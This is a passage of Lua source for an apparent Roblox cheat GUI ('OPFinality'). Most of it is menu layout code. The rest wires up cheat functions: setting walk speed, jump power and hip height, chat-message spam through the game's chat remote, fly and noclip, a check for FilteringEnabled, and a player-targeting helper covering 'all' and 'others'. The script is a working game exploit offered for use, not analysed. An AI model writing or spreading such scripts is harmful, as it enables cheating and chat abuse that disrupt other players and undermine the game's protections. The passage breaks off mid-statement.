25) Kill.Font = Enum.Font.SourceSans Kill.FontSize = Enum.FontSize.Size24 Kill.Text = "Kill" Kill.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Kill.TextSize = 22 Others_backPAGE2.Name = "Others_backPAGE2" Others_backPAGE2.Parent = Others_3 Others_backPAGE2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Others_backPAGE2.BorderSizePixel = 0 Others_backPAGE2.Position = UDim2.new(0.0679230243, 0, 0.0439298227, 0) Others_backPAGE2.Size = UDim2.new(0.113205045, 0, 0.109824568, 0) Others_backPAGE2.Font = Enum.Font.SourceSansLight Others_backPAGE2.FontSize = Enum.FontSize.Size24 Others_backPAGE2.Text = "Prev" Others_backPAGE2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Others_backPAGE2.TextSize = 22 Character_toPAGE1_IMAGE_4.Name = "Character_toPAGE1_IMAGE" Character_toPAGE1_IMAGE_4.Parent = Others_backPAGE2 Character_toPAGE1_IMAGE_4.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Character_toPAGE1_IMAGE_4.BorderSizePixel = 0 Character_toPAGE1_IMAGE_4.Position = UDim2.new(-0.400293052, 0, 0, 0) Character_toPAGE1_IMAGE_4.Size = UDim2.new(0, 25, 0, 25) Character_toPAGE1_IMAGE_4.Image = "http://www.roblox.com/asset/?id=1282894968" Games.Name = "Games" Games.Parent = Pages Games.BackgroundColor3 = Color3.new(0.92549, 0.941177, 0.945098) Games.BorderSizePixel = 0 Games.Position = UDim2.new(1, 0, 0, 0) Games.Size = UDim2.new(1, 0, 1, 0) Games_IMAGE.Name = "Games_IMAGE" Games_IMAGE.Parent = Games Games_IMAGE.BackgroundColor3 = Color3.new(1, 1, 1) Games_IMAGE.BackgroundTransparency = 1 Games_IMAGE.Position = UDim2.new(0.0679230243, 0, 0.109824568, 0) Games_IMAGE.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Games_IMAGE.Image = "http://www.roblox.com/asset/?id=1281454262" GamesText.Name = "GamesText" GamesText.Parent = Games GamesText.BackgroundColor3 = Color3.new(1, 1, 1) GamesText.BackgroundTransparency = 1 GamesText.Position = UDim2.new(0.158487067, 0, 0.109824568, 0) GamesText.Size = UDim2.new(0.65658927, 0, 0.175719291, 0) GamesText.Font = Enum.Font.SourceSansItalic GamesText.FontSize = Enum.FontSize.Size24 GamesText.Text = "Not a completed part, I will be updating with more games." GamesText.TextSize = 19 GamesText.TextWrapped = true Games_TITLE.Name = "Games_TITLE" Games_TITLE.Parent = Games Games_TITLE.BackgroundColor3 = Color3.new(1, 1, 1) Games_TITLE.BackgroundTransparency = 1 Games_TITLE.Position = UDim2.new(0.226410091, 0, 0, 0) Games_TITLE.Size = UDim2.new(0.522657692, 0, 0.1364429, 0) Games_TITLE.Font = Enum.Font.SourceSansBold Games_TITLE.FontSize = Enum.FontSize.Size28 Games_TITLE.Text = "Games" Games_TITLE.TextSize = 25 Games_IMAGE2.Name = "Games_IMAGE2" Games_IMAGE2.Parent = Games Games_IMAGE2.BackgroundColor3 = Color3.new(1, 1, 1) Games_IMAGE2.BackgroundTransparency = 1 Games_IMAGE2.Position = UDim2.new(0.815076292, 0, 0.109824568, 0) Games_IMAGE2.Size = UDim2.new(0.0908969939, 0, 0.175596073, 0) Games_IMAGE2.Image = "http://www.roblox.com/asset/?id=1281454262" SwordFightingTournament.Name = "SwordFightingTournament" SwordFightingTournament.Parent = Games SwordFightingTournament.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) SwordFightingTournament.BorderSizePixel = 0 SwordFightingTournament.Position = UDim2.new(0.350935638, 0, 0.329473704, 0) SwordFightingTournament.Size = UDim2.new(0.283012629, 0, 0.109824568, 0) SwordFightingTournament.Font = Enum.Font.SourceSans SwordFightingTournament.FontSize = Enum.FontSize.Size14 SwordFightingTournament.Text = "Sword Fighting Tournament" SwordFightingTournament.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) SwordFightingTournament.TextScaled = true SwordFightingTournament.TextSize = 14 SwordFightingTournament.TextWrapped = true PlatesOfFateMayhem.Name = "PlatesOfFateMayhem" PlatesOfFateMayhem.Parent = Games PlatesOfFateMayhem.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) PlatesOfFateMayhem.BorderSizePixel = 0 PlatesOfFateMayhem.Position = UDim2.new(0.350935638, 0, 0.483228087, 0) PlatesOfFateMayhem.Size = UDim2.new(0.283012629, 0, 0.109824568, 0) PlatesOfFateMayhem.Font = Enum.Font.SourceSans PlatesOfFateMayhem.FontSize = Enum.FontSize.Size14 PlatesOfFateMayhem.Text = "Plates of Fate: Mayhem" PlatesOfFateMayhem.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) PlatesOfFateMayhem.TextScaled = true PlatesOfFateMayhem.TextSize = 14 PlatesOfFateMayhem.TextWrapped = true GamesText2.Name = "GamesText2" GamesText2.Parent = Games GamesText2.BackgroundColor3 = Color3.new(1, 1, 1) GamesText2.BackgroundTransparency = 1 GamesText2.Position = UDim2.new(0.0679230243, 0, 0.768771946, 0) GamesText2.Size = UDim2.new(0.871678829, 0, 0.175719291, 0) GamesText2.Font = Enum.Font.SourceSansItalic GamesText2.FontSize = Enum.FontSize.Size24 GamesText2.Text = "Since games update, buttons can sometimes not work. If they do not work, please let me know so I can update." GamesText2.TextSize = 19 GamesText2.TextWrapped = true Frappe.Name = "Frappe" Frappe.Parent = Games Frappe.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Frappe.BorderSizePixel = 0 Frappe.Position = UDim2.new(0.350935638, 0, 0.636982441, 0) Frappe.Size = UDim2.new(0.283012629, 0, 0.109824568, 0) Frappe.Font = Enum.Font.SourceSans Frappe.FontSize = Enum.FontSize.Size14 Frappe.Text = "Frappe" Frappe.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Frappe.TextScaled = true Frappe.TextSize = 14 Frappe.TextWrapped = true Frappe_2.Name = "Frappe" Frappe_2.Parent = Games Frappe_2.BackgroundColor3 = Color3.new(0.203922, 0.286275, 0.368627) Frappe_2.BorderSizePixel = 0 Frappe_2.Position = UDim2.new(0.667909801, 0, 0.329473704, 0) Frappe_2.Size = UDim2.new(0.283012629, 0, 0.109824568, 0) Frappe_2.Font = Enum.Font.SourceSans Frappe_2.FontSize = Enum.FontSize.Size14 Frappe_2.Text = "Frappe" Frappe_2.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Frappe_2.TextScaled = true Frappe_2.TextSize = 14 Frappe_2.TextWrapped = true MenuFrame.Name = "MenuFrame" MenuFrame.Parent = MainFrame MenuFrame.BackgroundColor3 = Color3.new(0.741176, 0.764706, 0.780392) MenuFrame.BorderSizePixel = 0 MenuFrame.Position = UDim2.new(-0.38499999, 0, 0.075000003, 0) MenuFrame.Size = UDim2.new(0, 170, 0, 271) Welcome.Name = "Welcome" Welcome.Parent = MenuFrame Welcome.BackgroundColor3 = Color3.new(1, 1, 1) Welcome.BackgroundTransparency = 1 Welcome.Position = UDim2.new(0.0294333119, 0, 0.0184797049, 0) Welcome.Size = UDim2.new(0.941865981, 0, 0.0739188194, 0) Welcome.Font = Enum.Font.SourceSansLight Welcome.FontSize = Enum.FontSize.Size14 Welcome.Text = "Welcome," Welcome.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) Welcome.TextScaled = true Welcome.TextSize = 14 Welcome.TextWrapped = true NameOfPlayer.Name = "NameOfPlayer" NameOfPlayer.Parent = MenuFrame NameOfPlayer.BackgroundColor3 = Color3.new(1, 1, 1) NameOfPlayer.BackgroundTransparency = 1 NameOfPlayer.Position = UDim2.new(0, 0, 0.0923985243, 0) NameOfPlayer.Size = UDim2.new(0.971299291, 0, 0.0739188194, 0) NameOfPlayer.Font = Enum.Font.SourceSansItalic NameOfPlayer.FontSize = Enum.FontSize.Size14 NameOfPlayer.Text = "PlayerName" NameOfPlayer.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) NameOfPlayer.TextScaled = true NameOfPlayer.TextSize = 14 NameOfPlayer.TextWrapped = true T_Information.Name = "T_Information" T_Information.Parent = MenuFrame T_Information.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Information.BorderSizePixel = 0 T_Information.Position = UDim2.new(0, 0, 0.221756458, 0) T_Information.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Information.Font = Enum.Font.SourceSans T_Information.FontSize = Enum.FontSize.Size18 T_Information.Text = "Information" T_Information.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Information.TextSize = 16 T_Information.TextXAlignment = Enum.TextXAlignment.Left T_InfoImage.Name = "T_InfoImage" T_InfoImage.Parent = T_Information T_InfoImage.BackgroundColor3 = Color3.new(1, 1, 1) T_InfoImage.BackgroundTransparency = 1 T_InfoImage.Position = UDim2.new(0.79469943, 0, -0.400639981, 0) T_InfoImage.Size = UDim2.new(0.176599875, 0, 1.20192003, 0) T_InfoImage.Image = "http://www.roblox.com/asset/?id=1281284684" T_Character.Name = "T_Character" T_Character.Parent = MenuFrame T_Character.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Character.BorderSizePixel = 0 T_Character.Position = UDim2.new(0, 0, 0.388073802, 0) T_Character.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Character.Font = Enum.Font.SourceSans T_Character.FontSize = Enum.FontSize.Size18 T_Character.Text = "Character" T_Character.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Character.TextSize = 16 T_Character.TextXAlignment = Enum.TextXAlignment.Left T_CharImage.Name = "T_CharImage" T_CharImage.Parent = T_Character T_CharImage.BackgroundColor3 = Color3.new(1, 1, 1) T_CharImage.BackgroundTransparency = 1 T_CharImage.Position = UDim2.new(0.79469943, 0, -0.400639981, 0) T_CharImage.Size = UDim2.new(0.176599875, 0, 1.20192003, 0) T_CharImage.Image = "http://www.roblox.com/asset/?id=1281299598" T_Games.Name = "T_Games" T_Games.Parent = MenuFrame T_Games.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Games.BorderSizePixel = 0 T_Games.Position = UDim2.new(0, 0, 0.498952031, 0) T_Games.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Games.Font = Enum.Font.SourceSans T_Games.FontSize = Enum.FontSize.Size18 T_Games.Text = "Games" T_Games.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Games.TextSize = 16 T_Games.TextXAlignment = Enum.TextXAlignment.Left T_GameImage.Name = "T_GameImage" T_GameImage.Parent = T_Games T_GameImage.BackgroundColor3 = Color3.new(1, 1, 1) T_GameImage.BackgroundTransparency = 1 T_GameImage.Position = UDim2.new(0.79469943, 0, -0.400639981, 0) T_GameImage.Size = UDim2.new(0.176599875, 0, 1.20192003, 0) T_GameImage.Image = "http://www.roblox.com/asset/?id=1281454262" T_Others.Name = "T_Others" T_Others.Parent = MenuFrame T_Others.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Others.BorderSizePixel = 0 T_Others.Position = UDim2.new(0, 0, 0.60983026, 0) T_Others.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Others.Font = Enum.Font.SourceSans T_Others.FontSize = Enum.FontSize.Size18 T_Others.Text = "Others" T_Others.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Others.TextSize = 16 T_Others.TextXAlignment = Enum.TextXAlignment.Left T_OtherImage.Name = "T_OtherImage" T_OtherImage.Parent = T_Others T_OtherImage.BackgroundColor3 = Color3.new(1, 1, 1) T_OtherImage.BackgroundTransparency = 1 T_OtherImage.Position = UDim2.new(0.795000017, 0, -0.351000011, 0) T_OtherImage.Size = UDim2.new(0, 30, 0, 30) T_OtherImage.Image = "http://www.roblox.com/asset/?id=1281476978" T_Extra.Name = "T_Extra" T_Extra.Parent = MenuFrame T_Extra.BackgroundColor3 = Color3.new(0.584314, 0.647059, 0.65098) T_Extra.BorderSizePixel = 0 T_Extra.Position = UDim2.new(0, 0, 0.720708489, 0) T_Extra.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) T_Extra.Font = Enum.Font.SourceSans T_Extra.FontSize = Enum.FontSize.Size18 T_Extra.Text = "Extra" T_Extra.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) T_Extra.TextSize = 16 T_Extra.TextXAlignment = Enum.TextXAlignment.Left T_ExtraImage.Name = "T_ExtraImage" T_ExtraImage.Parent = T_Extra T_ExtraImage.BackgroundColor3 = Color3.new(1, 1, 1) T_ExtraImage.BackgroundTransparency = 1 T_ExtraImage.Position = UDim2.new(0.79469943, 0, -0.400639981, 0) T_ExtraImage.Size = UDim2.new(0.176599875, 0, 1.20192003, 0) T_ExtraImage.Image = "http://www.roblox.com/asset/?id=1281477720" DeleteGUI.Name = "DeleteGUI" DeleteGUI.Parent = MenuFrame DeleteGUI.BackgroundColor3 = Color3.new(0.752941, 0.223529, 0.168627) DeleteGUI.BorderSizePixel = 0 DeleteGUI.Position = UDim2.new(0, 0, 0.887025833, 0) DeleteGUI.Size = UDim2.new(1.00073266, 0, 0.0923985243, 0) DeleteGUI.Font = Enum.Font.SourceSans DeleteGUI.FontSize = Enum.FontSize.Size18 DeleteGUI.Text = "Delete GUI" DeleteGUI.TextColor3 = Color3.new(0.92549, 0.941177, 0.945098) DeleteGUI.TextSize = 16 DeleteGUI.TextXAlignment = Enum.TextXAlignment.Left DELETEIMAGE.Name = "DELETEIMAGE" DELETEIMAGE.Parent = DeleteGUI DELETEIMAGE.BackgroundColor3 = Color3.new(1, 1, 1) DELETEIMAGE.BackgroundTransparency = 1 DELETEIMAGE.Position = UDim2.new(0.853566051, 0, 0, 0) DELETEIMAGE.Size = UDim2.new(0.14716655, 0, 1.00160003, 0) DELETEIMAGE.Image = "http://www.roblox.com/asset/?id=1281475635" Darkness.Name = "Darkness" Darkness.Parent = MainFrame Darkness.BackgroundColor3 = Color3.new(0.180392, 0.192157, 0.176471) Darkness.BackgroundTransparency = 0.8 Darkness.BorderSizePixel = 0 Darkness.Position = UDim2.new(0.38499999, 0, 0.075000003, 0) Darkness.Size = UDim2.new(0, 272, 0, 271) Darkness.Visible = false Darkness.ZIndex = 7 Darkness.Font = Enum.Font.SourceSans Darkness.FontSize = Enum.FontSize.Size14 Darkness.Text = "" Darkness.TextSize = 14 ----------------------------------------------------------------- ----------------------------------------------------------------- NameOfPlayer.Text = game:GetService("Players").LocalPlayer.Name if game:GetService("Workspace").FilteringEnabled == true then Image_FE_ENABLED.Visible = true Image_FE_DISABLED.Visible = false Text_FE_ENABLED.Visible = true Text_FE_DISABLED.Visible = false else Image_FE_ENABLED.Visible = false Image_FE_DISABLED.Visible = true Text_FE_ENABLED.Visible = false Text_FE_DISABLED.Visible = true end function GetPlayer(String) -- Credit to Timeless/xFunnieuss local Found = {} local strl = String:lower() if strl == "all" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do table.insert(Found,v) end elseif strl == "others" then for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name ~= game:GetService("Players").LocalPlayer.Name then table.insert(Found,v) end end else for i,v in pairs(game:GetService("Players"):GetPlayers()) do if v.Name:lower():sub(1, #String) == String:lower() then table.insert(Found,v) end end end return Found end OpenMenu.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(0, 0, 0.075, 0), "Out", "Sine", 0.7) MenuEnterFrame:TweenPosition(UDim2.new(0, 170, 0.075, 0), "Out", "Sine", 0.7) Pages:TweenPosition(UDim2.new(0, 170, 0.223, 0), "Out", "Sine", 0.7) wait(0.7) Darkness.Visible = true Darkness.BackgroundTransparency = 0.8 end) Darkness.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.7) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.7) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.7) Darkness.Visible = false end) closedgui = true CloseGUI.MouseButton1Click:connect(function() wait(0.3) if closedgui then Pages.Position = UDim2.new(0, 0, 0.223, 0) OpenMenu.Position = UDim2.new(0, 0, 0, 0) MenuFrame.Position = UDim2.new(-0.38499999, 0, 0.075000003, 0) MenuEnterFrame.Position = UDim2.new(0, 0, 0.0741975307, 0) Darkness.Visible = false Pages:TweenPosition(UDim2.new(0, 0, -0.786, 0), "Out", "Sine", 1.5) OpenMenu:TweenPosition(UDim2.new(-0.102, 0, 0, 0), "Out", "Sine", 1.5) wait(1.6) MenuFrame.Position = UDim2.new(-0.38499999, 0, 0.075000003, 0) Darkness.Visible = false MenuEnterFrame.Position = UDim2.new(0, 0, 0.0741975307, 0) closedgui = false else Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 1.5) wait(1.5) OpenMenu:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) wait(0.6) closedgui = true end end) DeleteGUI.MouseButton1Click:connect(function() game:GetService("CoreGui").OPFinality:Destroy() end) T_Character.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Games:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Information:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Character_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) T_Extra.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Games:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Information:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Extra_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) T_Games.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Information:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Games:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) T_Information.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Games:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Information:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) T_Others.MouseButton1Click:connect(function() MenuFrame:TweenPosition(UDim2.new(-0.385, 0, 0.075, 0), "Out", "Sine", 0.5) MenuEnterFrame:TweenPosition(UDim2.new(0, 0, 0.074, 0), "Out", "Sine", 0.5) Pages:TweenPosition(UDim2.new(0, 0, 0.223, 0), "Out", "Sine", 0.5) Darkness.Visible = false wait(0.5) Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Games:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Information:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Character_toPAGE2.MouseButton1Click:connect(function() Character_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Character_2:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Character_backPAGE1.MouseButton1Click:connect(function() Character_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Character_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Extra_toPAGE2.MouseButton1Click:connect(function() Extra_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Extra_2:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Extra_backPAGE1.MouseButton1Click:connect(function() Extra_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Extra_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Others_toPAGE2.MouseButton1Click:connect(function() Others_1:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_2:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Others_toPAGE3.MouseButton1Click:connect(function() Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_3:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Others_backPAGE1.MouseButton1Click:connect(function() Others_2:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_1:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) Others_backPAGE2.MouseButton1Click:connect(function() Others_3:TweenPosition(UDim2.new(1, 0, 0, 0), "Out", "Sine", 0.5) wait(0.5) Others_2:TweenPosition(UDim2.new(0, 0, 0, 0), "Out", "Sine", 0.5) end) ------------------------------------------------------------------------------- ------------------------------------------------------------------------------- HipHeight.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.HipHeight = TXTBOX_Stats.Text end) Speed.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.WalkSpeed = TXTBOX_Stats.Text end) JumpHeight.MouseButton1Click:connect(function() game:GetService("Players").LocalPlayer.Character.Humanoid.JumpPower = TXTBOX_Stats.Text end) Chat.MouseButton1Click:connect(function() game:GetService("ReplicatedStorage").DefaultChatSystemChatEvents.SayMessageRequest:FireServer(TXTBOX_Chat.Text, "All") end) SpammingChar = false Spam_2.MouseButton1Click:connect(function() SpammingChar = not SpammingChar end) local flying = false Fly.MouseButton1Click:connect(function() flying = not flying repeat wait() until game:GetService("Players").LocalPlayer and game:GetService("Players").LocalPlayer.Character and game:GetService("Players").LocalPlayer.Character:findFirstChild("Torso") and game:GetService("Players").LocalPlayer.Character:findFirstChild("Humanoid") local mouse = game:GetService("Players").LocalPlayer:GetMouse() repeat wait() until mouse local plr = game:GetService("Players").LocalPlayer local torso = plr.Character.Torso local deb = true local ctrl = {f = 0, b = 0, l = 0, r = 0} local lastctrl = {f = 0, b = 0, l = 0, r = 0} local maxspeed = 80 local speed = 0 if flying then Fly.BackgroundColor3 = Color3.new(0.201961, 0.837255, 0.711765) else Fly.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) end function FlyFunction() local bg = Instance.new("BodyGyro", torso) bg.P = 9e4 bg.maxTorque = Vector3.new(9e9, 9e9, 9e9) bg.cframe = torso.CFrame local bv = Instance.new("BodyVelocity", torso) bv.velocity = Vector3.new(0,0.1,0) bv.maxForce = Vector3.new(9e9, 9e9, 9e9) repeat wait() plr.Character.Humanoid.PlatformStand = true if ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0 then speed = speed+.5+(speed/maxspeed) if speed > maxspeed then speed = maxspeed end elseif not (ctrl.l + ctrl.r ~= 0 or ctrl.f + ctrl.b ~= 0) and speed ~= 0 then speed = speed-1 if speed < 0 then speed = 0 end end if (ctrl.l + ctrl.r) ~= 0 or (ctrl.f + ctrl.b) ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (ctrl.f+ctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(ctrl.l+ctrl.r,(ctrl.f+ctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed lastctrl = {f = ctrl.f, b = ctrl.b, l = ctrl.l, r = ctrl.r} elseif (ctrl.l + ctrl.r) == 0 and (ctrl.f + ctrl.b) == 0 and speed ~= 0 then bv.velocity = ((game:GetService("Workspace").CurrentCamera.CoordinateFrame.lookVector * (lastctrl.f+lastctrl.b)) + ((game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.new(lastctrl.l+lastctrl.r,(lastctrl.f+lastctrl.b)*.2,0).p) - game:GetService("Workspace").CurrentCamera.CoordinateFrame.p))*speed else bv.velocity = Vector3.new(0,0.1,0) end bg.cframe = game:GetService("Workspace").CurrentCamera.CoordinateFrame * CFrame.Angles(-math.rad((ctrl.f+ctrl.b)*50*speed/maxspeed),0,0) until not flying ctrl = {f = 0, b = 0, l = 0, r = 0} lastctrl = {f = 0, b = 0, l = 0, r = 0} speed = 0 bg:Destroy() bv:Destroy() plr.Character.Humanoid.PlatformStand = false end mouse.KeyDown:connect(function(key) if key:lower() == "w" then ctrl.f = 1 elseif key:lower() == "s" then ctrl.b = -1 elseif key:lower() == "a" then ctrl.l = -1 elseif key:lower() == "d" then ctrl.r = 1 end end) mouse.KeyUp:connect(function(key) if key:lower() == "w" then ctrl.f = 0 elseif key:lower() == "s" then ctrl.b = 0 elseif key:lower() == "a" then ctrl.l = 0 elseif key:lower() == "d" then ctrl.r = 0 end end) FlyFunction() end) clip = true Noclip.MouseButton1Click:connect(function() clip = not clip game:GetService('RunService').Stepped:connect(function() if not clip then Noclip.BackgroundColor3 = Color3.new(0.201961, 0.837255, 0.711765) game:GetService("Players").LocalPlayer.Character.Head.CanCollide = false game:GetService("Players").LocalPlayer.Character.Torso.CanCollide = false game:GetService("Players").LocalPlayer.Character["Left Leg"].CanCollide = false game:GetService("Players").LocalPlayer.Character["Right Leg"].CanCollide = false else Noclip.BackgroundColor3 = Color3.new(0.101961, 0.737255, 0.611765) end end) end) local Anim = Instance.new("Animation") Anim.AnimationId = "rbxassetid://33169583" local track = game:GetService("Players").LocalPlayer.Character.Humanoid:LoadAnimation(Anim) local armsareoff = false game:GetService("Players").LocalPlayer.CharacterAdded:Connect(function(character) track = character:WaitForChild("Humanoid"):LoadAnimation(Anim) armsareoff = false armsoff.BackgroundColor3 = Color3.new(0.901961, 0.494118, 0.133333) end) armsoff.MouseButton1Click:connect(function() armsareoff = not armsareoff if armsareoff then armsoff.BackgroundColor3 = 